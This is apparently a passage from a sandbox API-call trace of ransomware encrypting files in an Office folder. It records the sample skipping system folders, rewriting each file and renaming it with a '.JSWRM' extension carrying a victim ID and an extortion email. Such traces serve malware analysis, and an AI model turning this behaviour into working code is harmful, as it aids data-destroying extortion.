lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COUPON.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COUPON.POC", lpUsedDefaultChar=0x0) returned 10 [0140.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0140.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0140.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0140.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0140.883] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\COUPON.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\coupon.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.884] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=50834) returned 1 [0140.884] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc690) returned 0x27b348 [0140.884] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xc690, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xc690, lpOverlapped=0x0) returned 1 [0140.888] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.888] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xc690, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xc690, lpOverlapped=0x0) returned 1 [0140.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0140.889] CloseHandle (hObject=0x238) returned 1 [0140.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0140.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0140.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0140.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0140.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0140.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0140.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0140.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0140.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0140.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0140.889] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\COUPON.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\coupon.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\COUPON.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\coupon.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0140.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0140.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0140.890] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21994fc3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21994fc3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21994fc3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGACCBAR.DPV", cAlternateFileName="")) returned 1 [0140.890] lstrcmpiW (lpString1="DGACCBAR.DPV", lpString2=".") returned 1 [0140.890] lstrcmpiW (lpString1="DGACCBAR.DPV", lpString2="..") returned 1 [0140.890] lstrcmpiW (lpString1="DGACCBAR.DPV", lpString2="...") returned 1 [0140.890] lstrcmpiW (lpString1="DGACCBAR.DPV", lpString2="windows") returned -1 [0140.890] lstrcmpiW (lpString1="DGACCBAR.DPV", lpString2="recovery") returned -1 [0140.890] lstrcmpiW (lpString1="DGACCBAR.DPV", lpString2="perflogs") returned -1 [0140.891] lstrcmpiW (lpString1="DGACCBAR.DPV", lpString2="documents and settings") returned -1 [0140.891] lstrcmpiW (lpString1="DGACCBAR.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.891] lstrcmpiW (lpString1="DGACCBAR.DPV", lpString2="system volume information") returned -1 [0140.891] lstrcmpiW (lpString1="DGACCBAR.DPV", lpString2="msocache") returned -1 [0140.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0140.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGACCBAR.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGACCBAR.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGACCBAR.DPV", lpUsedDefaultChar=0x0) returned 12 [0140.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0140.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0140.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGACCBAR.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGACCBAR.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGACCBAR.DPV", lpUsedDefaultChar=0x0) returned 12 [0140.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0140.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0140.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0140.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0140.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGACCBAR.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgaccbar.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.892] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10752) returned 1 [0140.892] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.892] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a00) returned 0x27b348 [0140.892] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2a00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2a00, lpOverlapped=0x0) returned 1 [0140.894] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.894] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2a00, lpOverlapped=0x0) returned 1 [0140.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0140.894] CloseHandle (hObject=0x238) returned 1 [0140.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0140.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0140.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0140.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0140.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0140.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0140.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0140.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0140.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.895] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGACCBAR.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgaccbar.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGACCBAR.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgaccbar.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0140.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0140.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0140.896] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb22, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGACCBAR.XML", cAlternateFileName="")) returned 1 [0140.896] lstrcmpiW (lpString1="DGACCBAR.XML", lpString2=".") returned 1 [0140.896] lstrcmpiW (lpString1="DGACCBAR.XML", lpString2="..") returned 1 [0140.896] lstrcmpiW (lpString1="DGACCBAR.XML", lpString2="...") returned 1 [0140.896] lstrcmpiW (lpString1="DGACCBAR.XML", lpString2="windows") returned -1 [0140.896] lstrcmpiW (lpString1="DGACCBAR.XML", lpString2="recovery") returned -1 [0140.896] lstrcmpiW (lpString1="DGACCBAR.XML", lpString2="perflogs") returned -1 [0140.896] lstrcmpiW (lpString1="DGACCBAR.XML", lpString2="documents and settings") returned -1 [0140.896] lstrcmpiW (lpString1="DGACCBAR.XML", lpString2="$RECYCLE.BIN") returned 1 [0140.896] lstrcmpiW (lpString1="DGACCBAR.XML", lpString2="system volume information") returned -1 [0140.896] lstrcmpiW (lpString1="DGACCBAR.XML", lpString2="msocache") returned -1 [0140.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0140.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGACCBAR.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGACCBAR.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGACCBAR.XML", lpUsedDefaultChar=0x0) returned 12 [0140.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0140.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0140.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGACCBAR.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGACCBAR.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGACCBAR.XML", lpUsedDefaultChar=0x0) returned 12 [0140.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0140.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0140.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0140.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0140.897] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGACCBAR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgaccbar.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.898] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2850) returned 1 [0140.898] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb20) returned 0x24e1d8 [0140.898] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xb20, lpOverlapped=0x0) returned 1 [0140.900] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.900] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xb20, lpOverlapped=0x0) returned 1 [0140.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0140.900] CloseHandle (hObject=0x238) returned 1 [0140.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0140.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0140.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0140.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0140.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0140.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0140.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0140.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0140.900] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGACCBAR.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgaccbar.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGACCBAR.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgaccbar.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0140.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0140.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0140.901] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x219bb1e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x219bb1e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x219bb1e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGACCBOX.DPV", cAlternateFileName="")) returned 1 [0140.901] lstrcmpiW (lpString1="DGACCBOX.DPV", lpString2=".") returned 1 [0140.901] lstrcmpiW (lpString1="DGACCBOX.DPV", lpString2="..") returned 1 [0140.901] lstrcmpiW (lpString1="DGACCBOX.DPV", lpString2="...") returned 1 [0140.901] lstrcmpiW (lpString1="DGACCBOX.DPV", lpString2="windows") returned -1 [0140.901] lstrcmpiW (lpString1="DGACCBOX.DPV", lpString2="recovery") returned -1 [0140.901] lstrcmpiW (lpString1="DGACCBOX.DPV", lpString2="perflogs") returned -1 [0140.902] lstrcmpiW (lpString1="DGACCBOX.DPV", lpString2="documents and settings") returned -1 [0140.902] lstrcmpiW (lpString1="DGACCBOX.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.902] lstrcmpiW (lpString1="DGACCBOX.DPV", lpString2="system volume information") returned -1 [0140.902] lstrcmpiW (lpString1="DGACCBOX.DPV", lpString2="msocache") returned -1 [0140.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0140.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGACCBOX.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGACCBOX.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGACCBOX.DPV", lpUsedDefaultChar=0x0) returned 12 [0140.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0140.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0140.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGACCBOX.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGACCBOX.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGACCBOX.DPV", lpUsedDefaultChar=0x0) returned 12 [0140.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0140.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0140.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0140.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0140.902] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGACCBOX.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgaccbox.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 